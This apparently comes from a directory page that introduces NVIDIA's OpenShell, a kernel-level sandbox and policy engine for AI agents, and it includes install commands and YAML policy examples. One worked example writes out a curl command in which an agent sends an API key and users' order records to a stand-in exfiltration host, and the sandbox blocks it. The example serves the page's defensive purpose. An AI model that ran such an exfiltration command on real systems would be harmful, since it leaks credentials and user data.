OpenShell Skill:NVIDIA 出品的 AI Agent 安全沙箱运行时
OpenShell 是 NVIDIA 在 GTC 2026 上开源的安全运行时,专为需要长时间运行、自动调用工具、接触文件系统和网络资源的 AI Agent 设计。它的核心思路是把安全边界从「模型内部的文字指令」移到「内核级别的强制隔离」——无论 Agent 本身是否被篡改,策略都在内核层被执行,Agent 无法突破。这套方案吸引了 Adobe、Atlassian、SAP、Salesforce、Cisco、Red Hat 等 17 家企业合作伙伴联合背书,一跃成为 2026 年企业级 Agent 安全领域最受关注的基础设施项目之一。
功能与原则
OpenShell 围绕两个核心能力构建:
- 内核级沙箱隔离:在 Linux 上通过 Landock LSM 和 seccomp BPF 实现文件系统、网络和进程层面的强制隔离;在 macOS Apple Silicon 上通过 SafeHouse 框架;在 Windows 上通过 WSL 2(实验性支持)。沙箱启动后,Agent 的每一次文件读写、网络连接、系统调用都会经过策略检查,Agent 自身无法绕过。
- 声明式 YAML 策略引擎:安全策略以 YAML 文件描述,系统在运行时强制执行。策略变更支持热加载,管理员可以在不重启沙箱的情况下更新权限,所有 allow/deny 决策都会记录完整审计日志。
设计原则是「默认拒绝」(deny-by-default)和「策略即代码」(policy-as-code)——每个沙箱从最小权限开始,管理员显式声明 Agent 可以访问哪些文件、哪些网络目的地、哪些 API provider,Agent 只能在边界内行动。
认可度
- GitHub Star:约 11,057(截至 2026-09-30),Forks 1,456
- GitHub Trending:2026 年 9 月多次登上 GitHub 热门榜
- 企业背书:GTC 2026 宣布,17 家企业合作伙伴,包括 Adobe、Atlassian、SAP、Salesforce、ServiceNow、Siemens、Cisco、CrowdStrike、Red Hat、Box 等
- 硬件厂商支持:Dell、HPE、Lenovo 均已适配
- 定位:已被纳入 NVIDIA Agent Toolkit 核心组件,与 NemoClaw(Agent 编排框架)协同使用
链接
GitHub:https://github.com/NVIDIA/OpenShell
官方文档:https://docs.nvidia.com/openshell/latest/
原作者
NVIDIA(英伟达),主导工程师为 Ali Golshan(Gretel 联合创始人,2025 年 3 月被 NVIDIA 以九位数收购)。OpenShell 项目于 2026 年 2 月创建,2026 年 3 月 GTC 大会正式公开,当前为 Alpha 状态(v0.1.x)。
介绍
AI Agent 和传统聊天机器人最大的安全差异在于:Agent 拥有持久化 shell、实时凭证、能安装软件包甚至重写自身工具,还能积累数小时的上下文。这意味着传统的「文字指令式」安全护栏(写在 system prompt 里或工具描述中)已经不够用了——一个被污染的提示词、一段恶意的 README、一安装的不安全 Skill,都可以绕过文字护栏,接触到真实的凭证和数据。
OpenShell 的回答是把安全决策点完全移到 Agent 进程之外。它在 Agent 和主机之间插入一个网关(Gateway)+ 监督者(Supervisor)+ 沙箱(Sandbox)的架构:Agent 跑在沙箱里,所有文件访问、系统调用、网络连接都必须经过策略引擎的审查,凭证以环境变量形式按需注入到发往特定 API endpoint 的请求中,Agent 文件系统里永远看不到真实密钥。
隐私路由(Privacy Router)是另一个关键能力——它可以强制 Agent 的所有模型推理请求先经过本地推理服务端点(inference.local),敏感数据不会流出到云端。结合 NVIDIA 自家 GPU 加速能力,Agent 可以在沙箱内直接调用本地 RTX GPU 做推理,同时保持完全隔离。
特点
- 内核级强制隔离:不依赖模型自身的文字指令,Landlock + seccomp BPF 在 OS 层阻断越权操作,Agent 无法绕过
- 声明式 YAML 策略:策略即代码版本化管理,支持热更新,变更无需重启沙箱,完整审计日志覆盖每一次 allow/deny 决策
- L7 HTTP 流量检查:在应用层拦截 Agent 的网络请求,可区分 GET/POST 等 HTTP 方法,支持细粒度网络策略(如仅允许访问特定 API 端点)
- 隐私路由器:支持 inference.local 路由,强制本地推理,数据不外流;凭证按需注入,Agent 文件系统不存储明文密钥
- GPU Passthrough:实验性支持 NVIDIA GPU 直通,Agent 可以在沙箱内利用本地 GPU 做推理加速,同时保持隔离
- 形式化验证:策略变更在生效前经过形式化验证检查,自动标记高风险新增权限(如新增可触及的主机或 API 方法),需要人工 review 后才能批准
- 多后端支持:沙箱计算后端支持 Docker、Podman、MicroVM、Kubernetes,适应从个人开发者到企业级部署的全场景
使用方法
安装(一行命令):
curl -LsSf https://raw.githubusercontent.com/NVIDIA/OpenShell/main/install.sh | sh
安装完成后会配置 CLI 和本地网关(Gateway)。
创建沙箱并运行 Agent:
# 创建沙箱
openshell sandbox create --name demo
# 在沙箱中运行 Claude Code
openshell sandbox run --name demo --agent claude
# 或连接已有沙箱
openshell sandbox connect <sandbox-id>
应用网络策略示例:
# policy.yaml - 只允许访问 GitHub API GET 请求
version: 1
network:
- name: github-read-only
allowed-destinations:
- host: api.github.com
ports: [443]
methods: [GET]
default: deny
openshell policy set --policy policy.yaml --wait
查看审计日志:
openshell audit list --sandbox demo
使用场景与人群
适用场景:
- 企业内部部署需要长时间运行的 AI 编程 Agent(Claude Code、Codex、OpenCode、Cursor 等),确保不发生数据泄露
- 需要在合规环境中运行 Agent 的金融、医疗、法律等行业,策略需要可审计、可版本控制
- 开发团队管理多个 Agent 并行任务,需要统一的安全边界和成本控制
- 研究者评估 Agent 行为安全性,需要可重复的隔离实验环境
目标用户:
- AI 工程团队负责人(关注 Agent 安全的企业级落地)
- 安全工程师(评估和管控 AI Agent 攻击面)
- DevOps/Platform 团队(需要将 Agent 纳入现有基础设施治理体系)
- AI 研究者(研究 Agent 行为边界和安全隔离方案)
输入与输出案例
案例 1:阻止数据外泄
Input(Agent 在沙箱内尝试执行):
curl -X POST -d '{"api_key":"sk-xxx","data":"用户全部订单记录"}' https://external-exfil-site.com/upload
OpenShell 策略引擎动作:
→ 检查目标主机 external-exfil-site.com,不在 allowed-destinations 列表
→ 阻断连接,记录审计日志 {"timestamp":"...","action":"deny","dest":"external-exfil-site.com","method":"POST"}
→ Agent 端返回错误,但无法感知是被安全策略拦截
Output:请求被静默阻断,数据未外泄,管理员可在审计日志中看到完整记录
案例 2:凭证按需注入
Input(管理员配置策略):
provider "anthropic" {
endpoint = "https://api.anthropic.com"
inject_credentials = true # 开启凭证注入
}
Agent 发送请求时:
→ OpenShell 在 Gateway 层注入 ANTHROPIC_API_KEY 到发往 api.anthropic.com 的请求头
→ Agent 文件系统中不存在明文密钥
→ 其他非授权 endpoint 无法获取该凭证
Output:凭证只在经授权的特定请求中按需注入,Agent 进程本身不持有永久密钥
OpenShell 的出现回答了一个 2026 年 Agent 时代必须面对的问题:当 Agent 可以自主操作数小时、接触真实凭证和文件系统时,如何让这种自主性变得安全可控?它的答案是把安全边界从模型内部移到内核层,让策略可验证、可审计、不可绕过。NVIDIA 的背书和 17 家企业合作伙伴的生态支持,让它成为目前企业级 Agent 安全基础设施中最具重量级的开源选项。
评论区
登录后可评论。